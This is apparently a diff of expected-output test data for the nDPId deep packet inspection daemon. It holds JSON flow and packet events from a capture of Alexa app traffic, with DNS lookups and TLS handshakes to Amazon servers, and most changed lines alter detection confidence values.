+00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1490976029669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1490976029669,"pkt":"AMDKkaPvePiC0\/vCCABFAABGWk9AAEARM16sECrYrBAqAU3\/ADUAMlRV5qsBAAABAAAAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1490976029753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976029753,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw0QhAAEARvHqsECoBrBAq2AA1Tf8AXGjL5quBgAABAAIAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQABwAwABQABAAACoQAOBG1hZHMGYW1hem9uwCHANgABAAEAAAAGAAQ0XugA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1490976030681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976030681,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWlBAAEARM1+sECrYrBAqARy+ADUAMIK\/xAMBAAABAAAAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1490976030758,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976030758,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQalIAAEABYqGsECoBrBAq2AUBAe6sECoqRQAANMRJQAA\/Bpp3rBAq2DRV0cXXygG707KdlouELZKAEAGm9GwAAAEBCAoA9kpTbQnnbg=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1490976030890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1490976030890,"pkt":"ePiC0\/vCAMDKkaPvCABFAABU0XFAAEARvC2sECoBrBAq2AA1HL4AQPRGxAOBgAABAAEAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAABwABDbvFrk="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 